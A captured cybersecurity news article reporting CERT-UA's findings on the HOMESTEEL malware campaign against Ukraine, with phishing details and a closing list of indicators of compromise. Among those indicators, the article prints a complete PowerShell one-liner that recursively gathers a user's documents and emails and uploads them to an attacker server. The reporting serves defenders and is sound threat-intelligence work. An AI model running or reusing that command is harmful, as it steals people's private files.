thecyberexpress.com
Open in
urlscan Pro
2606:4700:20::681a:18a
Public Scan
URL:
https://thecyberexpress.com/homesteel-malware-emerges-in-ukraine/
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_83328533 Search All
Submission: On October 26 via api from GB — Scanned from GB
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_83328533 Search All
Submission: On October 26 via api from GB — Scanned from GB
Form analysis 8 forms found in the DOM
GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>GET https://thecyberexpress.com
<form action="https://thecyberexpress.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select name="cat" id="cat" class="postform">
<option value="-1">Select Category</option>
<option class="level-0" value="54">Appointments</option>
<option class="level-0" value="55">Budgets</option>
<option class="level-0" value="680">Bug Bounty & Rewards</option>
<option class="level-0" value="50">Business News</option>
<option class="level-0" value="44">Compliance</option>
<option class="level-0" value="42">Cyber Essentials</option>
<option class="level-0" value="1">Cyber News</option>
<option class="level-0" value="48">Cyber Warfare</option>
<option class="level-0" value="5677">Cybersecurity Awareness Month</option>
<option class="level-0" value="3089">Dark Web News</option>
<option class="level-0" value="41">Data Breach News</option>
<option class="level-0" value="3104">DDoS Attacks News</option>
<option class="level-0" value="6225">Deepfake</option>
<option class="level-0" value="49">Espionage</option>
<option class="level-0" value="47">Features</option>
<option class="level-0" value="39">Firewall Daily</option>
<option class="level-0" value="1599">Gitex2022</option>
<option class="level-0" value="45">Governance</option>
<option class="level-0" value="4159">Hacker Claims</option>
<option class="level-0" value="40">Hacker News</option>
<option class="level-0" value="7751">Hackers Interview</option>
<option class="level-0" value="2026">How to</option>
<option class="level-0" value="62">Interviews</option>
<option class="level-0" value="8932">Knowledge Hub</option>
<option class="level-0" value="57">Learning & Development</option>
<option class="level-0" value="3953">Lockbit Ransomware News</option>
<option class="level-0" value="265">Main Story</option>
<option class="level-0" value="3077">Malware News</option>
<option class="level-0" value="61">Market Reports</option>
<option class="level-0" value="52">Mergers & Aquisitions</option>
<option class="level-0" value="53">Partnerships</option>
<option class="level-0" value="63">Podcast</option>
<option class="level-0" value="46">Policy Updates</option>
<option class="level-0" value="1087">Press Release</option>
<option class="level-0" value="71">Ransomware News</option>
<option class="level-0" value="43">Regulations</option>
<option class="level-0" value="58">Research</option>
<option class="level-0" value="3094">Resources</option>
<option class="level-0" value="60">Sponsored Content</option>
<option class="level-0" value="51">Startups</option>
<option class="level-0" value="8381">Threat Actors</option>
<option class="level-0" value="4388">Threat Intelligence</option>
<option class="level-0" value="4376">Threat Intelligence News</option>
<option class="level-0" value="70">Vulnerabilities</option>
<option class="level-0" value="3079">Vulnerability News</option>
<option class="level-0" value="7637">What is</option>
<option class="level-0" value="59">Whitepapers</option>
<option class="level-0" value="56">Workforce</option>
</select>
</form>POST #
<form action="#" data-type="login" method="post" accept-charset="utf-8">
<h3>Welcome Back!</h3>
<p>Login to your account below</p>
<!-- Form Messages -->
<div class="form-message"></div>
<p class="input_field">
<input type="text" name="username" placeholder="Username" value="">
</p>
<p class="input_field">
<input type="password" name="password" placeholder="Password" value="">
</p>
<p class="input_field remember_me">
<input type="checkbox" id="remember_me" name="remember_me" value="true">
<label for="remember_me">Remember Me</label>
</p>
<p class="submit">
<input type="hidden" name="action" value="login_handler">
<input type="hidden" name="jnews_nonce" value="96ada650a5">
<input type="submit" name="jeg_login_button" class="button" value="Log In" data-process="Processing . . ." data-string="Log In">
</p>
<div class="bottom_links clearfix">
<a href="#jeg_forgotform" class="jeg_popuplink forgot">Forgotten Password?</a>
</div>
</form>POST #
<form action="#" data-type="forgot" method="post" accept-charset="utf-8">
<h3>Retrieve your password</h3>
<p>Please enter your username or email address to reset your password.</p>
<!-- Form Messages -->
<div class="form-message"></div>
<p class="input_field">
<input type="text" name="user_login" placeholder="Your email or username" value="">
</p>
<div class="g-recaptcha" data-sitekey=""></div>
<p class="submit">
<input type="hidden" name="action" value="forget_password_handler">
<input type="hidden" name="jnews_nonce" value="96ada650a5">
<input type="submit" name="jeg_login_button" class="button" value="Reset Password" data-process="Processing . . ." data-string="Reset Password">
</p>
<div class="bottom_links clearfix">
<a href="#jeg_loginform" class="jeg_popuplink"><i class="fa fa-lock"></i> Log In</a>
</div>
</form>POST #
<form action="#" method="post" accept-charset="utf-8">
<h3>Add New Playlist</h3>
<!-- Form Messages -->
<div class="form-message"></div>
<div class="form-group">
<p class="input_field">
<input type="text" name="title" placeholder="Playlist Name" value="">
</p>
<p class="input_field">
<select name="visibility">
<option disabled="" selected="selected" value="">- Select Visibility -</option>
<option value="public">Public</option>
<option value="private">Private</option>
</select>
</p>
<!-- submit button -->
<div class="submit">
<input type="hidden" name="type" value="create_playlist">
<input type="hidden" name="action" value="playlist_handler">
<input type="hidden" name="post_id" value="">
<input type="hidden" name="jnews-playlist-nonce" value="560a272065">
<input type="submit" name="jeg_save_button" class="button" value="Save" data-process="Processing . . ." data-string="Save">
</div>
</div>
</form>GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>Text Content
#1 TRENDING CYBERSECURITY NEWS & MAGAZINE
We are Hiring!
Friday, October 25, 2024
No Result
View All Result
Free Newsletter
* MagazineDownload
* Firewall Daily
* All
* Bug Bounty & Rewards
* Dark Web News
* Data Breach News
* Hacker News
* Ransomware News
* Vulnerabilities
‘I’M NOT A ROBOT’ RECAPTCHA TROJANIZED BY RUSSIAN HACKERS TO TARGET LOCAL
UKRAINIAN GOVERNMENT
HOMESTEEL MALWARE EMERGES AS THE LATEST CYBERTHREAT TO UKRAINE’S DATA ASSETS
CRITICAL VULNERABILITIES FOUND IN SIEMENS AND SCHNEIDER ELECTRIC PRODUCTS
CISCO PATCHES CRITICAL VULNERABILITY AFFECTING VPN SERVICES
IRISH DPC SLAPS LINKEDIN WITH €310 MILLION FINE OVER DATA PROCESSING
VIOLATIONS
DON’T IGNORE THIS SIMPLE TIP: NSA SAYS REBOOTING CAN PROTECT YOUR PHONE
IRANIAN HACKERS TARGET U.S. ELECTION SYSTEMS AHEAD OF 2024 PRESIDENTIAL RACE
HACKERS CAN BE HEROES: THE IMPORTANCE OF RESPONSIBLE DISCLOSURE
RUSSIA CAME CLOSE TO BREACHING U.S. CRITICAL INFRASTRUCTURE BEFORE UKRAINE
WAR, CISA OFFICIAL REVEALS
TRENDING TAGS
* blackbyte ransomware
* Ransomware
* lapsus$ ransomware
* Apple
* Apple vulnerability
* Essentials
* All
* Compliance
* Governance
* Policy Updates
* Regulations
IRISH DPC SLAPS LINKEDIN WITH €310 MILLION FINE OVER DATA PROCESSING
VIOLATIONS
CYBERSECURITY MEETS PLAY: UCF’S HORSE PLINKO PREPARES STUDENTS FOR REAL-WORLD
THREATS
MAIL-IN BALLOTS AT RISK? CISA AND USPIS UNLEASH NEW PROTECTIONS FOR VOTERS
CFPB FINALIZES DATA PRIVACY RULE TO BOOST COMPETITION, PROTECT CONSUMERS
SEC FINES MAJOR COMPANIES FOR MISLEADING CYBER DISCLOSURES AMID SOLARWINDS
FALLOUT
INDIA, AUSTRALIA, JAPAN, AND US UNITE FOR QUAD CYBER CHALLENGE TO BOOST
GLOBAL CYBERSECURITY WORKFORCE
NEW U.S. RULE TAKES AIM AT FOREIGN ACCESS TO SENSITIVE DATA
SOPHOS TO ACQUIRE SECUREWORKS IN $859M DEAL TO EXPAND XDR OFFERINGS
GLOBE LIFE FACES EXTORTION AFTER HACKERS STEAL CUSTOMER DATA AT A SUBSIDIARY
* Regulations
* Compliance
* Governance
* Policy Updates
* Knowledge Hub
* All
* How to
* What is
SHIELD YOUR ORGANIZATION: CEO’S PERSPECTIVE ON TAKE-DOWN SERVICES
MICROSOFT ANNOUNCES MANDATORY MFA FOR AZURE SIGN-INS TO BOLSTER CLOUD
DEFENSES
HOW TO SET UP SIGNAL PROXY TO HELP BYPASS CENSORSHIP IN RUSSIA AND VENEZUELA
WHY HEALTHCARE CISOS MUST PRIORITIZE THIRD-PARTY RISK MANAGEMENT
PROTECT YOUR STREAMING ACCOUNTS NOW BEFORE IT’S TOO LATE
KNOWBE4 UNCOVERS FAKE EMPLOYEE: HOW A NORTH KOREAN HACKER WAS HIRED INTO THE
TEAM
PROTECTING TELECOM NETWORKS: CTO STRATEGIES FOR DARK WEB THREATS
HOW TO FIX THE WINDOWS ‘BLUE SCREEN OF DEATH’ ISSUE CAUSED BY CROWDSTRIKE
PROACTIVE CYBER DEFENSE: THE ROLE OF DARK WEB MONITORING FOR CEOS IN BANKING
* Features
* Cyber Warfare
* Espionage
* Workforce
* Learning & Development
* Business
* All
* Appointments
* Budgets
* Mergers & Aquisitions
* Partnerships
* Press Release
* Startups
SOPHOS TO ACQUIRE SECUREWORKS IN $859M DEAL TO EXPAND XDR OFFERINGS
GISEC NORTH STAR: WORLD’S LARGEST CYBERSECURITY STARTUP HUB DEBUTS IN 2025
CYBLE PARTNERS WITH YIRIGAA TO EMPOWER INDIGENOUS TECH LEADERS
TOP 10 THREAT INTELLIGENCE COMPANIES PROTECTING BUSINESSES IN 2025
LINKEDIN HALTS AI MODEL TRAINING IN THE UK AMID PRIVACY CONCERNS
UKRAINE BANS TELEGRAM ON STATE-ISSUED DEVICES
PORT OF SEATTLE CONFIRMS RANSOMWARE ATTACK DISRUPTED OPERATIONS, RAISES DATA
BREACH CONCERNS
CYBLE’S MANISH CHACHADA EXPLAINS WHY INDEPENDENCE MATTERS IN THREAT
INTELLIGENCE
META SET TO UN-PAUSE ITS AI TRAINING IN THE UK
* Startups
* Mergers & Aquisitions
* Partnerships
* Appointments
* Budgets
* Research
* Whitepapers
* Sponsored Content
* Market Reports
* Interviews
* Podcast
* Events
* Conference
* Webinar
* Endorsed Events
* Advisory Board
* MagazineDownload
* Firewall Daily
* All
* Bug Bounty & Rewards
* Dark Web News
* Data Breach News
* Hacker News
* Ransomware News
* Vulnerabilities
‘I’M NOT A ROBOT’ RECAPTCHA TROJANIZED BY RUSSIAN HACKERS TO TARGET LOCAL
UKRAINIAN GOVERNMENT
HOMESTEEL MALWARE EMERGES AS THE LATEST CYBERTHREAT TO UKRAINE’S DATA ASSETS
CRITICAL VULNERABILITIES FOUND IN SIEMENS AND SCHNEIDER ELECTRIC PRODUCTS
CISCO PATCHES CRITICAL VULNERABILITY AFFECTING VPN SERVICES
IRISH DPC SLAPS LINKEDIN WITH €310 MILLION FINE OVER DATA PROCESSING
VIOLATIONS
DON’T IGNORE THIS SIMPLE TIP: NSA SAYS REBOOTING CAN PROTECT YOUR PHONE
IRANIAN HACKERS TARGET U.S. ELECTION SYSTEMS AHEAD OF 2024 PRESIDENTIAL RACE
HACKERS CAN BE HEROES: THE IMPORTANCE OF RESPONSIBLE DISCLOSURE
RUSSIA CAME CLOSE TO BREACHING U.S. CRITICAL INFRASTRUCTURE BEFORE UKRAINE
WAR, CISA OFFICIAL REVEALS
TRENDING TAGS
* blackbyte ransomware
* Ransomware
* lapsus$ ransomware
* Apple
* Apple vulnerability
* Essentials
* All
* Compliance
* Governance
* Policy Updates
* Regulations
IRISH DPC SLAPS LINKEDIN WITH €310 MILLION FINE OVER DATA PROCESSING
VIOLATIONS
CYBERSECURITY MEETS PLAY: UCF’S HORSE PLINKO PREPARES STUDENTS FOR REAL-WORLD
THREATS
MAIL-IN BALLOTS AT RISK? CISA AND USPIS UNLEASH NEW PROTECTIONS FOR VOTERS
CFPB FINALIZES DATA PRIVACY RULE TO BOOST COMPETITION, PROTECT CONSUMERS
SEC FINES MAJOR COMPANIES FOR MISLEADING CYBER DISCLOSURES AMID SOLARWINDS
FALLOUT
INDIA, AUSTRALIA, JAPAN, AND US UNITE FOR QUAD CYBER CHALLENGE TO BOOST
GLOBAL CYBERSECURITY WORKFORCE
NEW U.S. RULE TAKES AIM AT FOREIGN ACCESS TO SENSITIVE DATA
SOPHOS TO ACQUIRE SECUREWORKS IN $859M DEAL TO EXPAND XDR OFFERINGS
GLOBE LIFE FACES EXTORTION AFTER HACKERS STEAL CUSTOMER DATA AT A SUBSIDIARY
* Regulations
* Compliance
* Governance
* Policy Updates
* Knowledge Hub
* All
* How to
* What is
SHIELD YOUR ORGANIZATION: CEO’S PERSPECTIVE ON TAKE-DOWN SERVICES
MICROSOFT ANNOUNCES MANDATORY MFA FOR AZURE SIGN-INS TO BOLSTER CLOUD
DEFENSES
HOW TO SET UP SIGNAL PROXY TO HELP BYPASS CENSORSHIP IN RUSSIA AND VENEZUELA
WHY HEALTHCARE CISOS MUST PRIORITIZE THIRD-PARTY RISK MANAGEMENT
PROTECT YOUR STREAMING ACCOUNTS NOW BEFORE IT’S TOO LATE
KNOWBE4 UNCOVERS FAKE EMPLOYEE: HOW A NORTH KOREAN HACKER WAS HIRED INTO THE
TEAM
PROTECTING TELECOM NETWORKS: CTO STRATEGIES FOR DARK WEB THREATS
HOW TO FIX THE WINDOWS ‘BLUE SCREEN OF DEATH’ ISSUE CAUSED BY CROWDSTRIKE
PROACTIVE CYBER DEFENSE: THE ROLE OF DARK WEB MONITORING FOR CEOS IN BANKING
* Features
* Cyber Warfare
* Espionage
* Workforce
* Learning & Development
* Business
* All
* Appointments
* Budgets
* Mergers & Aquisitions
* Partnerships
* Press Release
* Startups
SOPHOS TO ACQUIRE SECUREWORKS IN $859M DEAL TO EXPAND XDR OFFERINGS
GISEC NORTH STAR: WORLD’S LARGEST CYBERSECURITY STARTUP HUB DEBUTS IN 2025
CYBLE PARTNERS WITH YIRIGAA TO EMPOWER INDIGENOUS TECH LEADERS
TOP 10 THREAT INTELLIGENCE COMPANIES PROTECTING BUSINESSES IN 2025
LINKEDIN HALTS AI MODEL TRAINING IN THE UK AMID PRIVACY CONCERNS
UKRAINE BANS TELEGRAM ON STATE-ISSUED DEVICES
PORT OF SEATTLE CONFIRMS RANSOMWARE ATTACK DISRUPTED OPERATIONS, RAISES DATA
BREACH CONCERNS
CYBLE’S MANISH CHACHADA EXPLAINS WHY INDEPENDENCE MATTERS IN THREAT
INTELLIGENCE
META SET TO UN-PAUSE ITS AI TRAINING IN THE UK
* Startups
* Mergers & Aquisitions
* Partnerships
* Appointments
* Budgets
* Research
* Whitepapers
* Sponsored Content
* Market Reports
* Interviews
* Podcast
* Events
* Conference
* Webinar
* Endorsed Events
* Advisory Board
No Result
View All Result
No Result
View All Result
TRENDING
TARGETED INDUSTRIES -> IT & ITES | Government & LEA | Technology | Healthcare |
BFSITARGETED COUNTRIES -> United States | Russian Federation | China | United
Kingdom | GermanyTARGETED REGIONS -> North America (NA) | Europe & UK | Asia &
Pacific (APAC) | Middle East & Africa (MEA) | Australia and New Zealand
(ANZ)IOCs -> a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 |
7bdbd180c081fa63ca94f9c22c457376 |
c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 |
8c69830a50fb85d8a794fa46643493b2 | bbcf7a68f4164a9f5f5cb2d9f30d9790CVEs ->
CVE-2024-21887 | CVE-2023-46805 | CVE-2017-11882 | CVE-2024-21893 |
CVE-2021-44228TECHNIQUES -> T1082 | T1140 | T1486 | T1083 | T1105TACTICS ->
TA505 | TA0011 | TA0001 | TA0002 | TA0005TAGS -> security | the-cyber-express |
firewall-daily | the-cyber-express-news | malwareTHREAT ACTORS -> Lockbit |
Blackcat | Lazarus | VoltTyphoon | KimsukyMALWARE -> CobaltStrike | Qakbot |
Icedid | Trickbot | XmrigSOURCES -> Darkreading | The Cyber Express |
Bleepingcomputer | The Hacker News | Infosecurity Magazine
Home » Malware News » HOMESTEEL Malware Emerges as the Latest Cyberthreat to
Ukraine’s Data Assets
HOMESTEEL MALWARE EMERGES AS THE LATEST CYBERTHREAT TO UKRAINE’S DATA ASSETS
A SOPHISTICATED NEW MALWARE DUBBED HOMESTEEL FROM THE THREAT ACTOR UAC-0218 IS
TARGETING CRITICAL UKRAINIAN DATA REPOSITORIES.
by Mihir Bagwe
October 25, 2024
Reading Time: 4 mins read
Share on LinkedInShare on Twitter
A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a
new malware variant called HOMESTEEL that targets critical Ukrainian data
repositories. This latest offensive, flagged by Ukraine’s Computer Emergency
Response Team (CERT-UA), reflects the modus operandi of Ukraine’s adversaries
who aim to steal sensitive information from government and business networks.
CERT-UA identified the phishing methods, which include emails baiting recipients
through familiar subject lines like “account” and “details” and linking to a
seemingly legitimate “eDisk” platform.
The eDisk link directs users to download RAR files that house malicious content,
embedding two password-protected files labeled as “Contract20102024.doc” and
“Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file,
“Password.vbe,” ultimately initiates HOMESTEEL’s data-siphoning operations.
The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and
“pdf,” are systematically collected from user directories up to five subfolders
deep. HOMESTEEL’s code commands a recursive search, transmitting files under
10MB to an external server through an HTTP PUT request. This approach minimizes
data size to evade potential detection while maximizing data collection.
HOMESTEEL’S PROXY USE ELEVATES ATTACK COMPLEXITY
UAC-0218’s techniques appear particularly well-tailored to the environment.
HOMESTEEL can adapt to proxy settings on compromised systems, further
camouflaging its network traffic.
CERT-UA reported that each outgoing request to the attacker’s server contains
the full path of the extracted file, which may assist attackers in cataloging
sensitive files across compromised systems. This level of customization suggests
a level of surveillance intelligence typically seen in more complex, persistent
attacks.
Your browser does not support the video tag.
A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a
command-line shell in Windows environments widely exploited in cyber operations.
CERT-UA researchers found an additional executable acting as a self-extracting
archive with embedded PowerShell commands. These commands initiate further file
reconnaissance, scanning user directories for extensions like xls*, doc*, pdf
and eml, and dispatching files to a central server via HTTP POST requests.
This double-methodology showcases HOMESTEEL’s resilience, as it attempts to
bypass any security hurdles the initial infection vector encounters.
INFRASTRUCTURE TACTICS LINK CAMPAIGN TO AUGUST ORIGINS
The CERT-UA findings link UAC-0218’s activities back to August 2024, based on
the domain registration data of its command infrastructure. Ukrainian cyber
defenders on Wednesday revealed another campaign that began in August with a
similar intent but no links between the two could be established as the threat
actor in that case is tracked as UAC-0215.
The attackers leveraged HostZealot, a domain name registrar, and configured a
custom Python-based web server as the central data-receiving platform. The
server reveals a distinctive “Python Software Foundation BaseHTTP 0.6” banner,
helping analysts attribute this campaign to the same infrastructure used in
prior UAC-0218 attacks.
By reusing components across multiple operations, UAC-0218 demonstrates a
persistent strategy that leverages existing digital assets to increase
efficiency and reduce overhead.
The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which
has long battled cyber aggression. As cyber espionage campaigns against Ukraine
continue to evolve, CERT-UA’s proactive monitoring of UAC-0218 indicates a
critical awareness of threats that leverage evolving malware tactics and refined
phishing methodologies.
INDICATORS OF COMPROMISE AS SHARED BY CERT-UA
File Hashes:
10d486a514212bff2ef181010e8bd421 3432fe8487b72860cf60b54169f071e26336c56ff078ff78a13e8e29a02b4424 _№_601.rar
dc7e9ab6374bccf3225d95ed4595a608 1679e968b0672342091b2bef5c379767bc59bf575f7ed8d9c6abbdc10fcafe01 Account20102024.xlsx
16e2255474930bab59d59a62caf35a5b 7dd938f2b0d809a80e9e3bf80f9c9d5b27145962871fdc19772ecda95b948abb Agreement 20102024.doc
7c95cd4b9471c904db3a5afc9179b3bc c95fcee5b3daace259c4f31f699c4fca82da7ebc8ed950caa630ca763b2b3e15 Password.vbe
cd03aa7bc1b1f2b64f0c6856ba312484 f541d5c6338d65afba2245685ac1189b44c90393d7e67b70289e1f28b6da6c52 WEXTRACT.EXE
d7a120fee99b0655a08f330a4542f141 465c8bbf75a1717546450cf88aa53d4e12345ab2c776b99dbef1c147da34966a install.txt
325a5308c225ed14355d5afcd12a059c 4ba64f21fb69f2b10debdcf9f8424d0090c98d4dfb3d0d0f9faac0458ba9ae00 POSTRUNPROGRAM
62febd43f2253710adaeea3a0639d26d b8e6665682f4a0a70dcbd4134441041f290fc8b357503ab122fc09911a8a9629 RUNPROGRAM
Network:
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 1712-327.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 3881-251.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 612-118.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 692-251.rar
hXXps://edisk.in[.]ua/571df09c9c45758/account No. 1712-327.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/ №_601.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/Invoice No. 6492-115.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/2024-10-10_001.rar
hXXps://staticgl[.]one/
hXXps://winupmirror[.]support/
edisk.ukrnet.01mirror.com[.]ua
ukrnet.01mirror.com[.]ua
01mirror.com.ua 2024-10-10 ukrnames.com swiftydns.com
edisk.in.ua 2024-10-23 ukrnames.com swiftydns.com
winupmirror.support 2024-10-09 namecheap.com swiftydns.com
staticgl.one 2024-08-23 namecheap.com registrar-servers.com
109[.]205.195.233 (C2)
194[.]107.92.234 (X-Originating-IP)
46[.]149.173.221 (X-Originating-IP)
94[.]140.114.32
94[.]140.114.76
Hosts:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')"
powershell.exe "[Net.ServicePointManager]::SecurityProtocol='Tls12';foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"
SHARE THIS:
* Click to share on LinkedIn (Opens in new window)
* Click to share on Reddit (Opens in new window)
* Click to share on Twitter (Opens in new window)
* Click to share on Facebook (Opens in new window)
* More
*
* Click to email a link to a friend (Opens in new window)
* Click to share on WhatsApp (Opens in new window)
*
RELATED
MIHIR BAGWE
Bagwe has nearly half a decade of experience in reporting on the latest
cybersecurity news and trends, and interviewing cybersecurity subject matter
experts. He has previously worked with ISMG and CISO MAG, publications focussed
on addressing the cybersecurity needs of the C-Suite, particularly the CISO and
CIO communities.
Next Post
'I'M NOT A ROBOT' RECAPTCHA TROJANIZED BY RUSSIAN HACKERS TO TARGET LOCAL
UKRAINIAN GOVERNMENT
Your browser does not support the video tag.
Follow Us On Google News
LATEST ISSUE IS OUT. SUBSCRIBE NOW
LATEST CYBER NEWS
Espionage
‘I’M NOT A ROBOT’ RECAPTCHA TROJANIZED BY RUSSIAN HACKERS TO TARGET LOCAL
UKRAINIAN GOVERNMENT
October 25, 2024
Malware News
HOMESTEEL MALWARE EMERGES AS THE LATEST CYBERTHREAT TO UKRAINE’S DATA ASSETS
October 25, 2024
Vulnerabilities
CRITICAL VULNERABILITIES FOUND IN SIEMENS AND SCHNEIDER ELECTRIC PRODUCTS
October 25, 2024
Firewall Daily
CISCO PATCHES CRITICAL VULNERABILITY AFFECTING VPN SERVICES
October 25, 2024
CATEGORIES
Categories Select Category Appointments Budgets Bug Bounty & Rewards Business
News Compliance Cyber Essentials Cyber News Cyber Warfare Cybersecurity
Awareness Month Dark Web News Data Breach News DDoS Attacks News Deepfake
Espionage Features Firewall Daily Gitex2022 Governance Hacker Claims Hacker News
Hackers Interview How to Interviews Knowledge Hub Learning & Development Lockbit
Ransomware News Main Story Malware News Market Reports Mergers & Aquisitions
Partnerships Podcast Policy Updates Press Release Ransomware News Regulations
Research Resources Sponsored Content Startups Threat Actors Threat Intelligence
Threat Intelligence News Vulnerabilities Vulnerability News What is Whitepapers
Workforce
WEB STORIES
Do This on Telegram, Your Bank Account Will Become Zero
If You Install the iOS 18 Beta, Your iPhone Could Be Hacked
Cricket World Cup Ticketing Systems Under Cybersecurity
Cyber Threats and Online Ticket Scams During the NBA Finals
Biometric Data Security: Protecting Sensitive Information
SUBSCRIBE TO DAILY NEWS
Stay ahead of the curve with The Cyber Express’s Daily News! Our newsletter
delivers the latest cybersecurity headlines, expert insights, and critical
updates straight to your inbox every morning. From breaking news and in-depth
analysis to emerging threats and industry trends, our curated content ensures
you’re always informed and prepared.
Facebook Twitter LinkedIn
ABOUT
THE CYBER EXPRESS
#1 Trending Cybersecurity News and Magazine
The Cyber Express is a handbook for all stakeholders of the internet that
provides information security professionals with the latest news, updates and
knowledge they need to combat cyber threats.
CONTACT
For editorial queries: editor@thecyberexpress.com
For marketing and Sales: raj@thecyberexpress.com
For Events & Conferences related information: ashish.j@thecyberexpress.com
QUICK LINKS
* About Us
* Contact Us
* Editorial Calendar
* Careers
* The Cyber Express by Cyble Vulnerability Disclosure Policy
* Cyble Trust Portal
OUR ADDRESS
We’re remote friendly, with office locations around the world:
San Francisco, Atlanta, Rome,
Dubai, Mumbai, Bangalore, Hyderabad, Singapore, Jakarta, Sydney, and Melbourne
Headquarters:
The Cyber Express LLC
555 North Point Center E
Alpharetta, GA 30022, USA.
India Office:
Cyber Express Media Network
HD-021, 4th Floor, C Wing, Building No.4. Nesco IT Park, WE Highway, Goregaon
East, Mumbai, Maharashtra, India – 4000063
© 2022 - 2024 The Cyber Express by Cyble. All Rights Reserved
WELCOME BACK!
Login to your account below
Remember Me
Forgotten Password?
RETRIEVE YOUR PASSWORD
Please enter your username or email address to reset your password.
Log In
ADD NEW PLAYLIST
- Select Visibility -PublicPrivate
No Result
View All Result
* Magazine
* Firewall Daily
* Essentials
* Regulations
* Compliance
* Governance
* Policy Updates
* Knowledge Hub
* Features
* Cyber Warfare
* Espionage
* Workforce
* Learning & Development
* Business
* Startups
* Mergers & Aquisitions
* Partnerships
* Appointments
* Budgets
* Research
* Whitepapers
* Sponsored Content
* Market Reports
* Interviews
* Podcast
* Events
* Conference
* Webinar
* Endorsed Events
* Advisory Board
© 2022 - 2024 The Cyber Express by Cyble. All Rights Reserved
ARE YOU SURE WANT TO UNLOCK THIS POST?
Unlock left : 0 Yes No
ARE YOU SURE WANT TO CANCEL SUBSCRIPTION?
Yes No
Do This on Telegram, Your Bank Account Will Become Zero If You Install the iOS
18 Beta, Your iPhone Could Be Hacked Cricket World Cup Ticketing Systems Under
Cybersecurity Cyber Threats and Online Ticket Scams During the NBA Finals
Biometric Data Security: Protecting Sensitive Information